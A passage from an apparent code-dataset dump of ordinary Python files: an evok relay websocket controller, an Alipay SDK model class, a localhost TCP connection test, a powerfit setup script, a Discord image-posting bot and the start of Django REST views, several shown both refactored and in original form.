            self.long_press_timer_countdown -= 1
            dprint(self.long_press_timer_countdown)
        if self.long_press_button_active:
            self.all_off()
        dprint("Timer Stopped")

    def on_message(self, ws, message):
        """Dispatch one JSON message received from the evok server."""
        try:
            j = json.loads(message)
            dprint(j)
        except ValueError:
            # Non-JSON payload: ignore it.  (Was a bare `except: pass`,
            # which also hid programming errors.)
            return
        if j['dev'] == 'input' and j['bitvalue'] == 0:
            # Button released: cancel any pending long press.
            self.long_press_timer_countdown = 0
            self.long_press_button_active = 0
        # check for digital input and button is pushed in
        elif j['dev'] == 'input' and j['bitvalue'] == 1:
            self.long_press_timer_countdown = self.WAITTIME
            self.Timer = Thread(target = self.long_press_timer )
            self.Timer.start()
            action = self.di_relay_dict.get(j['circuit'])
            if action is None:
                # Unknown input circuit; nothing is configured for it.
                # (The original crashed here with AttributeError on None.)
                return
            # If the action is a digit toggle the relay with that number
            if action.isdigit():
                # We must retrieve the relay's current state first;
                # toggle_relay marks that we expect an answer to this query.
                self.toggle_relay = 1
                self.ws.send('{"cmd":"full","dev":"relay","circuit":"%s"}' %(j['circuit']))
            # if the action is allon switch all relays on
            elif action == 'allon':
                self.all_on()
            elif action == 'alloff':
                self.all_off()
        # check if we asked to toggle a relay; if yes, toggle it
        elif self.toggle_relay == 1 and j['dev'] == 'relay':
            self.toggle_relay = 0
            if j['value'] == 1:
                ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}'%(j['circuit']))
            else:
                ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}'%(j['circuit']))

    def all_on(self):
        """Switch relays 1-8 on, with a short delay between commands."""
        for x in range (1,9):
            self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}' %(x))
            time.sleep(0.05)

    def all_off(self):
        """Switch relays 1-8 off, with a short delay between commands."""
        for x in range (1,9):
            self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}' %(x))
            time.sleep(0.05)

    def on_error(self,ws, error):
        print(error)

    def on_close(self,ws):
        print ("### closed ###")

    def on_open(self,ws):
        print ("### opened ###")
        # just wait half a second to give the server some time
        time.sleep(.5)
if __name__ == "__main__":
    # Constructing myhome opens the websocket and blocks in run_forever().
    app= myhome()
| #############################################################################################################################
# Example 3: Basic websocket application to interact with evok api #
# Extension of the second example websocket2 #
# Adding a Long Press Button Event: #
# I implemented this on the client side #
# We start a Timer (longpress timer) on a button press #
# If the button is not released in 3 second we turn off all relays #
# We achieve this to check inside the timer function if the long press is still active after 3s #
# If the button is released before the 3 seconds are done we receive a message from the server #
# signaling the button is released by sending a bitvalue of 0 #
# if we receive this message we set the long_press_button_active = 0 #
# and we set the long_press_timer = 0 so our Timer exits #
# #
# #
# #
# #
# Example create by <NAME> #
# On 2019-05-15 #
#############################################################################################################################
import websocket
import time
import json
from threading import Thread
def dprint(e):
debug = 1
if debug:
print(e)
class myhome():
def __init__(self):
#define in 1/10 of seconds
self.WAITTIME = 20
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
self.Timer = None
self.toggle_relay = 0
self.di_relay_dict = {'1':'allon','2':'2','3':'3','4':'4','5':'5','6':'6','7':'7','8':'8'}
self.ws = websocket.WebSocketApp("ws://localhost/ws",
on_message = lambda ws,msg: self.on_message(ws, msg),
on_error = lambda ws,msg: self.on_error(ws, msg),
on_close = lambda ws: self.on_close(ws),
on_open = lambda ws: self.on_open(ws))
self.ws.run_forever()
def long_press_timer(self):
dprint("Timer is Started")
self.long_press_button_active = 1
while self.long_press_timer_countdown > 0:
time.sleep(.1)
self.long_press_timer_countdown -= 1
dprint(self.long_press_timer_countdown)
if self.long_press_button_active:
self.all_off()
dprint("Timer Stopped")
def on_message(self,ws, message):
try:
j = json.loads(message)
dprint(j)
except:
pass
else:
if j['dev'] == 'input' and j['bitvalue'] == 0:
self.long_press_timer_countdown = 0
self.long_press_button_active = 0
#check for digital input and button is pushed in
elif j['dev'] == 'input' and j['bitvalue'] == 1:
self.long_press_timer_countdown = self.WAITTIME
self.Timer = Thread(target = self.long_press_timer )
self.Timer.start()
action = self.di_relay_dict.get(j['circuit'])
# If the action is a digit toggle the relay with that number
if action.isdigit():
self.toggle_relay = 1
#we need to retrieve the current state of the relay so we set the toggle_relay to 1 to know we are expecting an answer on a question we asked
self.ws.send('{"cmd":"full","dev":"relay","circuit":"%s"}' %(j['circuit']))
#if the action is allon switch all relays on
elif action == 'allon':
self.all_on()
elif action == 'alloff':
self.all_off()
#check if we asked to toggle a relay if yes toggle it
elif self.toggle_relay == 1 and j['dev'] == 'relay':
self.toggle_relay = 0
if j['value'] == 1:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}'%(j['circuit']))
else:
ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}'%(j['circuit']))
def all_on(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"1"}' %(x))
time.sleep(0.05)
def all_off(self):
for x in range (1,9):
self.ws.send('{"cmd":"set","dev":"relay","circuit":"%s","value":"0"}' %(x))
time.sleep(0.05)
def on_error(self,ws, error):
print(error)
def on_close(self,ws):
print ("### closed ###")
def on_open(self,ws):
print ("### opened ###")
# just wait half a second to give the server some time
time.sleep(.5)
if __name__ == "__main__":
app= myhome()
| en | 0.640413 | ############################################################################################################################# # Example 3: Basic websocket application to interact with evok api # # Extension of the second example websocket2 # # Adding a Long Press Button Event: # # I implemented this on the client side # # We start a Timer (longpress timer) on a button press # # If the button is not released in 3 second we turn off all relays # # We achieve this to check inside the timer function if the long press is still active after 3s # # If the button is released before the 3 seconds are done we receive a message from the server # # signaling the button is released by sending a bitvalue of 0 # # if we receive this message we set the long_press_button_active = 0 # # and we set the long_press_timer = 0 so our Timer exits # # # # # # # # # # Example create by <NAME> # # On 2019-05-15 # ############################################################################################################################# #define in 1/10 of seconds #check for digital input and button is pushed in # If the action is a digit toggle the relay with that number #we need to retrieve the current state of the relay so we set the toggle_relay to 1 to know we are expecting an answer on a question we asked #if the action is allon switch all relays on #check if we asked to toggle a relay if yes toggle it ## closed ###") ## opened ###") # just wait half a second to give the server some time | 2.663792 | 3 |
alipay/aop/api/domain/ProductSimpleInfo.py | antopen/alipay-sdk-python-all | 0 | 6614001 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ProductSimpleInfo(object):
    """Alipay API model describing one product entry.

    Truthy attributes are serialized by :meth:`to_alipay_dict`; falsy
    values (None, 0, '') are omitted, matching the generated-SDK style.
    """

    # Attribute names that take part in dict (de)serialization.
    _FIELD_NAMES = ('category_name', 'count', 'end_time', 'product_name',
                    'product_type', 'sale_price', 'start_time', 'zone_name')

    def __init__(self):
        self._category_name = None
        self._count = None
        self._end_time = None
        self._product_name = None
        self._product_type = None
        self._sale_price = None
        self._start_time = None
        self._zone_name = None

    @property
    def category_name(self):
        return self._category_name

    @category_name.setter
    def category_name(self, value):
        self._category_name = value

    @property
    def count(self):
        return self._count

    @count.setter
    def count(self, value):
        self._count = value

    @property
    def end_time(self):
        return self._end_time

    @end_time.setter
    def end_time(self, value):
        self._end_time = value

    @property
    def product_name(self):
        return self._product_name

    @product_name.setter
    def product_name(self, value):
        self._product_name = value

    @property
    def product_type(self):
        return self._product_type

    @product_type.setter
    def product_type(self, value):
        self._product_type = value

    @property
    def sale_price(self):
        return self._sale_price

    @sale_price.setter
    def sale_price(self, value):
        self._sale_price = value

    @property
    def start_time(self):
        return self._start_time

    @start_time.setter
    def start_time(self, value):
        self._start_time = value

    @property
    def zone_name(self):
        return self._zone_name

    @zone_name.setter
    def zone_name(self, value):
        self._zone_name = value

    def to_alipay_dict(self):
        """Serialize truthy fields to a plain dict, recursing into values
        that expose their own ``to_alipay_dict()``.

        Replaces ~70 lines of copy-pasted per-field blocks with one loop;
        behavior (including omission of falsy values) is unchanged.
        """
        params = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if not value:
                continue  # falsy fields are omitted (original behavior)
            if hasattr(value, 'to_alipay_dict'):
                params[name] = value.to_alipay_dict()
            else:
                params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a ProductSimpleInfo from a dict.

        Returns None for a falsy input, mirroring the generated SDK;
        unknown keys in *d* are ignored.
        """
        if not d:
            return None
        o = ProductSimpleInfo()
        for name in ProductSimpleInfo._FIELD_NAMES:
            if name in d:
                setattr(o, name, d[name])
        return o
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ProductSimpleInfo(object):
def __init__(self):
self._category_name = None
self._count = None
self._end_time = None
self._product_name = None
self._product_type = None
self._sale_price = None
self._start_time = None
self._zone_name = None
@property
def category_name(self):
return self._category_name
@category_name.setter
def category_name(self, value):
self._category_name = value
@property
def count(self):
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def product_name(self):
return self._product_name
@product_name.setter
def product_name(self, value):
self._product_name = value
@property
def product_type(self):
return self._product_type
@product_type.setter
def product_type(self, value):
self._product_type = value
@property
def sale_price(self):
return self._sale_price
@sale_price.setter
def sale_price(self, value):
self._sale_price = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
@property
def zone_name(self):
return self._zone_name
@zone_name.setter
def zone_name(self, value):
self._zone_name = value
def to_alipay_dict(self):
params = dict()
if self.category_name:
if hasattr(self.category_name, 'to_alipay_dict'):
params['category_name'] = self.category_name.to_alipay_dict()
else:
params['category_name'] = self.category_name
if self.count:
if hasattr(self.count, 'to_alipay_dict'):
params['count'] = self.count.to_alipay_dict()
else:
params['count'] = self.count
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.product_name:
if hasattr(self.product_name, 'to_alipay_dict'):
params['product_name'] = self.product_name.to_alipay_dict()
else:
params['product_name'] = self.product_name
if self.product_type:
if hasattr(self.product_type, 'to_alipay_dict'):
params['product_type'] = self.product_type.to_alipay_dict()
else:
params['product_type'] = self.product_type
if self.sale_price:
if hasattr(self.sale_price, 'to_alipay_dict'):
params['sale_price'] = self.sale_price.to_alipay_dict()
else:
params['sale_price'] = self.sale_price
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
if self.zone_name:
if hasattr(self.zone_name, 'to_alipay_dict'):
params['zone_name'] = self.zone_name.to_alipay_dict()
else:
params['zone_name'] = self.zone_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ProductSimpleInfo()
if 'category_name' in d:
o.category_name = d['category_name']
if 'count' in d:
o.count = d['count']
if 'end_time' in d:
o.end_time = d['end_time']
if 'product_name' in d:
o.product_name = d['product_name']
if 'product_type' in d:
o.product_type = d['product_type']
if 'sale_price' in d:
o.sale_price = d['sale_price']
if 'start_time' in d:
o.start_time = d['start_time']
if 'zone_name' in d:
o.zone_name = d['zone_name']
return o | en | 0.352855 | #!/usr/bin/env python # -*- coding: utf-8 -*- | 2.29194 | 2 |
python/6.net/3.Ext/2.listen_test_client.py | dunitian/BaseCode | 25 | 6614002 | <reponame>dunitian/BaseCode<filename>python/6.net/3.Ext/2.listen_test_client.py
import time
import socket
def main():
    """Open 1000 short-lived TCP connections to 127.0.0.1:8080.

    Every 100th connection also sends ten '-' bytes and lingers for a
    second before closing; all other connections close immediately.
    """
    for attempt in range(1000):
        with socket.socket() as conn:
            conn.connect(('127.0.0.1', 8080))
            if attempt % 100 != 0:
                continue
            conn.send(b"-" * 10)
            time.sleep(1)
if __name__ == "__main__":
    # Run the connection exerciser only when executed as a script.
    main()
| import time
import socket
def main():
for i in range(1000):
with socket.socket() as tcp_client:
tcp_client.connect(('127.0.0.1', 8080))
if i % 100 == 0:
tcp_client.send(b"-" * 10)
time.sleep(1)
if __name__ == "__main__":
main() | none | 1 | 2.633188 | 3 | |
setup.py | WangXinyan940/powerfit | 16 | 6614003 | #! env/bin/python
import os.path
import numpy
from setuptools import setup
from setuptools.extension import Extension
try:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
CYTHON = True
except ImportError:
CYTHON = False
def main():
    """Build configuration for the powerfit package.

    Compiles the C extensions from Cython sources when Cython is
    available, otherwise from the pre-generated .c files.
    """
    packages = ['powerfit']
    # the C or Cython extension: prefer .pyx when Cython is installed
    ext = '.pyx' if CYTHON else '.c'
    ext_modules = [Extension("powerfit._powerfit",
                  [os.path.join("src", "_powerfit" + ext)],
                  include_dirs=[numpy.get_include()]),
              Extension("powerfit._extensions",
                  [os.path.join("src", "_extensions.c")],
                  include_dirs=[numpy.get_include()],
                  extra_compile_args=['-ffast-math'],
                  ),
              ]
    cmdclass = {}
    if CYTHON:
        # Translate the .pyx sources to C and hook in Cython's build_ext.
        ext_modules = cythonize(ext_modules)
        cmdclass = {'build_ext' : build_ext}
    package_data = {'powerfit': [os.path.join('data', '*.npy'), 'kernels.cl']}
    description = ("Rigid body fitting of high-resolution structures in "
            "low-resolution cryo-electron microscopy density maps")
    setup(name="powerfit",
          version='2.0.0',
          description=description,
          url="https://github.com/haddocking/powerfit",
          author='<NAME>',
          author_email='<EMAIL>',
          license="Apache",
          classifiers=[
              'Development Status :: 3 - Alpha',
              'Programming Language :: Python :: 2.7',
              'Intended Audience :: Science/Research',
              'Topic :: Scientific/Engineering :: Bio-Informatics',
          ],
          packages=packages,
          package_data = package_data,
          install_requires=['numpy>=1.8', 'scipy'],
          entry_points={
              'console_scripts': [
                  'powerfit = powerfit.powerfit:main',
                  'image-pyramid = powerfit.scripts:image_pyramid',
                  'em2em = powerfit.scripts:em2em',
              ]
          },
          ext_modules=ext_modules,
          include_dirs=[numpy.get_include()],
          cmdclass=cmdclass,
          )
if __name__=='__main__':
    # Run setup() only when executed directly (e.g. "python setup.py install").
    main()
| #! env/bin/python
import os.path
import numpy
from setuptools import setup
from setuptools.extension import Extension
try:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
CYTHON = True
except ImportError:
CYTHON = False
def main():
packages = ['powerfit']
# the C or Cython extension
ext = '.pyx' if CYTHON else '.c'
ext_modules = [Extension("powerfit._powerfit",
[os.path.join("src", "_powerfit" + ext)],
include_dirs=[numpy.get_include()]),
Extension("powerfit._extensions",
[os.path.join("src", "_extensions.c")],
include_dirs=[numpy.get_include()],
extra_compile_args=['-ffast-math'],
),
]
cmdclass = {}
if CYTHON:
ext_modules = cythonize(ext_modules)
cmdclass = {'build_ext' : build_ext}
package_data = {'powerfit': [os.path.join('data', '*.npy'), 'kernels.cl']}
description = ("Rigid body fitting of high-resolution structures in "
"low-resolution cryo-electron microscopy density maps")
setup(name="powerfit",
version='2.0.0',
description=description,
url="https://github.com/haddocking/powerfit",
author='<NAME>',
author_email='<EMAIL>',
license="Apache",
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
packages=packages,
package_data = package_data,
install_requires=['numpy>=1.8', 'scipy'],
entry_points={
'console_scripts': [
'powerfit = powerfit.powerfit:main',
'image-pyramid = powerfit.scripts:image_pyramid',
'em2em = powerfit.scripts:em2em',
]
},
ext_modules=ext_modules,
include_dirs=[numpy.get_include()],
cmdclass=cmdclass,
)
if __name__=='__main__':
main()
| en | 0.468228 | #! env/bin/python # the C or Cython extension | 1.813716 | 2 |
discordbot.py | markbasser/supergirls | 0 | 6614004 | <gh_stars>0
from discord.ext import commands
from discord.ext import tasks
import os
import traceback
import discord
from datetime import datetime
token = os.environ['DISCORD_BOT_TOKEN']
CHANNEL_ID =757346851963011172 # channel ID the scheduled images are posted to
# Create the client object required for the connection
client = discord.Client()
@client.event
async def on_ready():
    """Startup notification: log the bot's identity once connected."""
    print('ログインしました')
    print(client.user.name) # bot's name
    print(client.user.id) # bot's ID
    print(discord.__version__) # discord.py version
    print('------')
# Time of day ('HH:MM') -> image URL to post to CHANNEL_ID at that minute.
# NOTE(review): datetime.now() is naive local time - confirm the host's
# timezone matches the intended posting schedule.
POST_SCHEDULE = {
    '00:01': 'https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif',
    '01:02': 'https://cdn.discordapp.com/attachments/741585316703633419/758286779920285747/xjpsupergirls_ani07ban.gif',
    '02:03': 'https://media.discordapp.net/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif',
    '03:04': 'https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif',
    '04:05': 'https://cdn.discordapp.com/attachments/741585316703633419/757759865044074536/xjpsupergirls_ani04ban.gif',
    '05:31': 'https://cdn.discordapp.com/attachments/741585316703633419/757759856789815356/xjpsupergirls_ani03ban.gif',
    '06:37': 'https://cdn.discordapp.com/attachments/741585316703633419/757759841237205103/xjpsupergirls_ani02ban.gif',
    '08:00': 'https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif',
    '09:27': 'https://cdn.discordapp.com/attachments/741585316703633419/757458033533124649/XJPGIRL00.png',
    '11:28': 'https://cdn.discordapp.com/attachments/741585316703633419/757458053707726880/XJPGIRL02.png',
    '12:29': 'https://cdn.discordapp.com/attachments/741585316703633419/757159787996905552/xjpimage02.gif',
    '13:40': 'https://cdn.discordapp.com/attachments/741585316703633419/758668048613507102/xjpgirls2.png',
    '14:30': 'https://cdn.discordapp.com/attachments/741585316703633419/758655911841103892/xjpgirls1.png',
    '16:31': 'https://cdn.discordapp.com/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif',
    '20:58': 'https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif',
}

# Fires once every 60 seconds.
@tasks.loop(seconds=60)
async def loop():
    """Post the scheduled image when the current HH:MM matches an entry.

    Replaces sixteen copy-pasted `if now == ...` branches with a single
    table lookup; the posted URLs and times are unchanged.
    """
    now = datetime.now().strftime('%H:%M')
    url = POST_SCHEDULE.get(now)
    if url is not None:
        channel = client.get_channel(CHANNEL_ID)
        await channel.send(url)

# Start the periodic task.
loop.start()
# Exact message text -> reply template; '{mention}' is replaced with the
# author's mention before sending.  The reply strings are byte-identical
# to the original f-strings.
SIMPLE_REPLIES = {
    "<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>":
        "<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>",
    "<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>":
        "<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>",
    "ThankYou!!": "Dear💛{mention} 💛 Thank YOU! ",
    "Thank U": "Dear💚 {mention} 💚 Thank YOU! ",
    "Thank you everybody": "Dear💙 {mention} 💙 Thank YOU! ",
    "g.morning": "Dear♥ {mention}♥. good Morning🌞",
    "Good day all": "Dear♥ {mention}♥. Thank YOU! Good luck🌟 ",
    "<:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117>":
        "<:gf:721588114283298908> 💚{mention}さん💚 <:xjp_coin:739313946045055117> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_01:757806007475896441>",
}

# Command text -> (message to post, reaction emojis to attach to that post).
REACTION_COMMANDS = {
    "r/link": ("/link ", ('⭕', '❌')),
    "r/r": ("$deposit", ('⭕', '❌')),
    "r/bal": ("$bal", ('⭕', '🔑')),
    "b/benzan": (" /info ben ", ('⭕', '🔑')),
    "b/jpynzan": (" /info jpyn ", ('⭕', '🔑')),
    "b/bgptzan": (" /info bgpt ", ('⭕', '🔑')),
    "b/kenjzan": (" /info kenj ", ('⭕', '🔑')),
    "b/sprtszan": (" /info sprts ", ('⭕', '🔑')),
    "b/29zan": (" /info 29coin ", ('⭕', '🔑')),
}

@client.event
async def on_message(message):
    """Handle an incoming message: canned replies and reaction commands.

    Replaces the long duplicated if/elif chains with table lookups; at
    most one branch could ever match because the triggers are distinct
    exact strings, so the dispatch is behavior-preserving.
    """
    if message.author.bot:  # ignore messages from bots (including ourselves)
        return
    reply = SIMPLE_REPLIES.get(message.content)
    if reply is not None:
        await message.channel.send(reply.format(mention=message.author.mention))
        return
    command = REACTION_COMMANDS.get(message.content)
    if command is not None:
        text, reactions = command
        q = await message.channel.send(text)
        for icon in reactions:
            await q.add_reaction(icon)
# Start the bot and connect to the Discord server.
client.run(token)
| from discord.ext import commands
from discord.ext import tasks
import os
import traceback
import discord
from datetime import datetime
token = os.environ['DISCORD_BOT_TOKEN']
CHANNEL_ID =757346851963011172 #チャンネルID
# 接続に必要なオブジェクトを生成
client = discord.Client()
@client.event
async def on_ready():
"""起動時に通知してくれる処理"""
print('ログインしました')
print(client.user.name) # ボットの名前
print(client.user.id) # ボットのID
print(discord.__version__) # discord.pyのバージョン
print('------')
# 60秒に一回ループ
@tasks.loop(seconds=60)
async def loop():
# 現在の時刻
now = datetime.now().strftime('%H:%M')
if now == '00:01':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
if now == '01:02':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286779920285747/xjpsupergirls_ani07ban.gif')
if now == '02:03':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://media.discordapp.net/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '03:04':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '04:05':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759865044074536/xjpsupergirls_ani04ban.gif')
if now == '05:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759856789815356/xjpsupergirls_ani03ban.gif')
if now == '06:37':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757759841237205103/xjpsupergirls_ani02ban.gif')
if now == '08:00':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757745371765145630/xjpsupergirls_ani00ban.gif')
if now == '09:27':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458033533124649/XJPGIRL00.png')
if now == '11:28':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757458053707726880/XJPGIRL02.png')
if now == '12:29':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/757159787996905552/xjpimage02.gif')
if now == '13:40':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758668048613507102/xjpgirls2.png')
if now == '14:30':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758655911841103892/xjpgirls1.png')
if now == '16:31':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758286759716323328/xjpsupergirls_ani06ban.gif')
if now == '20:58':
channel = client.get_channel(CHANNEL_ID)
await channel.send('https://cdn.discordapp.com/attachments/741585316703633419/758285489257054238/xjpsupergirls_ani05ban.gif')
#ループ処理実行
loop.start()
@client.event
async def on_message(message):
"""メッセージを処理"""
if message.author.bot: # ボットのメッセージをハネる
return
if message.content == "<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441> <:xjpsupergirls_01:757806007475896441>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_02:757807252496318535>") # f文字列(フォーマット済み文字列リテラル)
if message.content == "ThankYou!!":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💛{message.author.mention} 💛 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank U":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💚 {message.author.mention} 💚 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Thank you everybody":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear💙 {message.author.mention} 💙 Thank YOU! ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "g.morning":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. good Morning🌞") # f文字列(フォーマット済み文字列リテラル)
if message.content == "Good day all":
# チャンネルへメッセージを送信
await message.channel.send(f"Dear♥ {message.author.mention}♥. Thank YOU! Good luck🌟 ") # f文字列(フォーマット済み文字列リテラル)
if message.content == "<:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117> <:xjp_coin:739313946045055117>":
# チャンネルへメッセージを送信
await message.channel.send(f"<:gf:721588114283298908> 💚{message.author.mention}さん💚 <:xjp_coin:739313946045055117> <:xjpsupergirls_02:757807252496318535> <:xjpsupergirls_01:757806007475896441>") # f文字列(フォーマット済み文字列リテラル)
elif message.content == "r/link":
# リアクションアイコンを付けたい
q = await message.channel.send("/link ")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/r":
# リアクションアイコンを付けたい
q = await message.channel.send("$deposit")
[await q.add_reaction(i) for i in ('⭕', '❌')] # for文の内包表記
elif message.content == "r/bal":
# リアクションアイコンを付けたい
q = await message.channel.send("$bal")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/benzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info ben ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/jpynzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info jpyn ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/bgptzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info bgpt ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/kenjzan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info kenj ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/sprtszan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info sprts ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
elif message.content == "b/29zan":
# リアクションアイコンを付けたい
q = await message.channel.send(" /info 29coin ")
[await q.add_reaction(i) for i in ('⭕', '🔑')] # for文の内包表記
# Botの起動とDiscordサーバーへの接続
client.run(token) | ja | 0.999595 | #チャンネルID # 接続に必要なオブジェクトを生成 起動時に通知してくれる処理 # ボットの名前 # ボットのID # discord.pyのバージョン # 60秒に一回ループ # 現在の時刻 #ループ処理実行 メッセージを処理 # ボットのメッセージをハネる # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # Botの起動とDiscordサーバーへの接続 | 2.449804 | 2 |
apps/api/views.py | IT2901-24-2018/orm | 2 | 6614005 | from django.db import connection
from rest_framework import permissions, status, viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from vapi.constants import INPUT_LIST_LIMIT, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH
from api.mapper.mapper import map_to_segment
from api.models import ProductionData, RoadSegment, WeatherData
from api.overlap_handler.overlap_handler import handle_prod_data_overlap
from api.permissions import IsAdminOrReadOnly, IsStaffOrCreateOnly
from api.segmenter.road_segmenter import segment_network
from api.serializers import (ProductionDataInputSerializer, ProductionDataSerializer,
RoadSegmentSerializer, WeatherDataInputSerializer,
WeatherDataSerializer)
from api.weather import weather
class StandardResultsSetPagination(PageNumberPagination):
    """Shared page-number pagination: 100 items per page by default,
    client-tunable via ``?page_size=`` up to a hard cap of 1000."""
    page_size = 100  # default number of items per page
    page_size_query_param = "page_size"  # query parameter clients may use to override
    max_page_size = 1000  # upper bound for client-requested page sizes
class RoadSegmentViewSet(viewsets.ModelViewSet):
